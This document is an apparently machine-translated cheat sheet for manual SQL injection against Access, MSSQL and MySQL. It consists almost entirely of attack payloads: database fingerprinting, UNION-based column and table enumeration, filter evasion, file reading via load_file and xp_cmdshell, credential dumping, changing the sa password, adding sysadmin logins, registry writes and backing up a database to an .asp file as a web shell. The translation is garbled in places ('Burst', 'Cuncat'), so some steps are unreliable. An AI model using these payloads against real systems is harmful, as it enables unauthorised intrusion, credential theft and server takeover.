To determine the database type:
Access:
and (select ID from msysaccessobjects) >0 return to the normal description is access
MSSQL:
and (select ID from sysobjects) >0 return to normal description is MSSQL
Mysql:
and length (user ()) >0 return to normal description is MySQL
Mysql:
1. Determine version and Ord (Mid (Version (), plus)) >51/* Return normal description is 4.0 or higher, you can use union query
2. Use ORDER by storm field, add order by 10/* After URL if return normal description field greater than 10
3. Use the Union to query the exact field, such as order by OR and 1=2 Union select,......./* until it returns to normal, indicating the number of exact fields guessed. If you filter the space can be replaced with/**/.
4. Determine if the database connection account has write permissions, and (select COUNT (*) from Mysql.user) >0/* If the result returns an error, then we can only guess the administrator account and password.
5. If you return to normal, you can 1=2 Union select 1,2,3,4,5,6,load_file (char (ASCII value of the file path, separated by commas), 8,9,10/* Note: Load_file (char ( The ASCII value of the file path, separated by commas) can also be used in hexadecimal to read the configuration file, locate the database connection, and so on.
6, detection is not root permission And/**/ord (Mid (User (), 1, 1)) =114/*
7, MySQL built-in function hex () conversion character is 16, such as Select Hex (User ())
MySQL built-in function Unhex () Decodes 16 binary, such as select Unhex (Hex (user))
8. mysql built-in function concat () merges multiple columns into one column, such as SELECT Concat (Username,0x3a,password) from T_member
9 commonly used built-in functions use:
Select System_user () View system users
Select Current_User () query the current user
Select User () queries users
SELECT version () queries the database version
SELECT database () queries the currently connected databases
SELECT @ @version_compile_os Query the current operating system
SELECT @ @datadir Query Read database path
SELECT @ @basedir query MySQL installation path
----------------------Satin Split-line---------------------------------------------
Remove limit to all rows, the first number represents the number of queries, and the second number represents a single query.
The first number increments from 1, and the query returns an error to the 3 o'clock browser, stating that there are 2 libraries/tables.
10, check the number of databases
Union Select Cuncat (schema_name,0x3a) from Information_schema.schemata limit
11. Enquiry Form
Union SELECT table_name from information_schema.tables where Table_schema = library name limit
MSSQL:
Detect if the SA permission
and 1= (select Is_srvrolemember (' sysadmin '));--
To detect if DB permissions
and 1= (Select is_member (' db_owner '))
Explode all databases union select name from Master.dbo.sysdatabases where Dbid=1 1 represents the first library
Explode all Tables
First table Union select top 1 name from library name. dbo.sysobjects where xtype= ' U '
Second table Union select top 1 name from library name. dbo.sysobjects where xtype= ' U ' and name not in (' first table ')
The third table union select top 1 name from library name. dbo.sysobjects where xtype= ' U ' and name not in (' first table ', ' second table ')
...
Burst column:
Burst ID Select ID from seay.dbo.sysobjects where xtype= ' U ' and name= ' admin '
Explode first column select top 1 name from Seay.dbo.syscolumns where Id=id number
Burst the second column select top 1 name from Seay.dbo.syscolumns where Id=id and name not in (' first column ')
...
Burst data:
Select Column name from table name
exec master.dbo.xp_dirtree ' C: \ '; Traverse Directory
EXEC master.dbo.xp_availablemedia;--obtains all current drives
exec master.dbo.xp_subdirs ' c: N ';--Get subdirectory list
exec master.dbo.xp_dirtree ' C: ';--Get the directory tree structure of all subdirectories
exec master.dbo.xp_cmdshell ' type c:\web\web.config ';--View the contents of a file
Back up the database: Backup library name to disk= ' c:/l.asp ';
MSSQL built-in functions:
SELECT @ @version Query database version
Select USER_NAME () query the current database connection user name
Select Db_name () queries the current database name
Change the sa password
exec sp_password NULL, ' New password ', ' sa '
Add SA permissions User
EXEC sp_addlogin ' username ', ' pass ', ' master ';
EXEC sp_addsrvrolemember ' username ', sysadmin
Detect if multiple lines are supported
;d Eclare @d int;--
Stop or activate a service.
EXEC master. Xp_servicecontrol ' Stop ', ' schedule '
EXEC master. Xp_servicecontrol ' start ', ' schedule '
Unpack the zip file.
Xp_unpackcab ' C:\test.cab ', ' C:\Temp ', 1
Recovery xp_cmdshell
; EXEC master. Dbo.sp_addextendedproc ' xp_cmdshell ', ' Xplog70.dll ';--
To turn on sandbox mode:
EXEC master. Xp_regwrite ' HKEY_LOCAL_MACHINE ', ' Software\microsoft\jet\4.0\engines ', ' SandboxMode ', ' REG_DWORD ', 1
Manually injecting common SQL statements